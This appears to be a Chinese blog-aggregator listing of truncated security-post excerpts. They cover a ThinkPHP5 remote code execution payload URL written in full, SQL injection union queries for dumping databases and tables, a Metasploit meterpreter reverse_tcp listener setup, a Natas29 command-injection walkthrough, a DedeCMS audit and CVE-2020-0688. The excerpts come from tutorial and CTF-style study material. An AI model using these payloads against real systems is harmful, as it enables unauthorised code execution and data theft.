1.thinkphp5 rce漏洞,构造payload, ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27 ...
分类:
Web程序 时间:
2020-03-12 14:18:31
阅读次数:
97
有时,通过Runtime.getRuntime().exec()执行命令的有效负载有时会失败。使用Web Shell,反序列化利用或通过其他媒介时,可能会发生这种情况。 有时这是因为重定向和管道字符的使用在启动过程的上下文中没有意义。例如,在shell中执行ls> dir_listing会将当前目录 ...
分类:
编程语言 时间:
2020-03-11 13:51:18
阅读次数:
72
步骤总览:一、vm虚拟机安装二、kali虚拟机搭建三、pwn工具安装,pwntools,兼容32位,gdb等 (三)pwn工具安装 pwntools是个工具包集合里面有很多前期分析程序需要的工具,最后用Python在写payload时也会调用到其中的函数。现在开始按步骤安装pwntools。 步骤一 ...
分类:
其他好文 时间:
2020-03-07 09:24:25
阅读次数:
63
Natas29: 本关打开后,可以看到一个下拉列表,选择不同的内容,会得到不同的大量文本的页面。 观察url部分:http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground 感觉是一个命令注入,尝试一下file=| ...
分类:
其他好文 时间:
2020-03-07 00:15:25
阅读次数:
84
1、msf创建监听 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterp ...
分类:
Web程序 时间:
2020-03-06 11:14:11
阅读次数:
110
0x00前言 开始从小的漏洞开始练习,搬运项目地址: https://github.com/imsebao/Code Audit 0x01 Dedecms是一款开源的PHP开源网站管理系统。 Dedecms会员功能carbuyaction.php中的address、des、email、postnam ...
分类:
其他好文 时间:
2020-03-05 13:48:59
阅读次数:
65
一 情景 本地kali linux 192.168.1.2 目标 windows NT 服务器192.168.1.4 目的是获取shell 二 过程 首先在linux建立终端 ,msfconsole 建立php的payload,shell.php root@simpleedu:~# rz root@ ...
1.和上一题一样的,payload都不用改 2.爆破 (1)爆库:?id=-1%E6' union select 1,2,database() --+ (2)爆表:?id=-1%E6' union select 1,group_concat(table_name),3 from informatio ...
分类:
其他好文 时间:
2020-03-03 19:07:06
阅读次数:
76
漏洞编号:CVE-2020-0688 漏洞描述:攻击者向存在缺陷的Exchange服务器发送经过特殊处理的电子邮件即可触发漏洞。这个漏洞是由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的。 具体来说,与每次软件安装都会产生随机密钥不同,所有Exchange Server在安装后 ...
分类:
其他好文 时间:
2020-03-02 12:55:23
阅读次数:
503
一:JWT是什么 JWT是json web token缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法。 JWT由三个部分组成:heade ...
分类:
Web程序 时间:
2020-03-01 18:24:25
阅读次数:
86
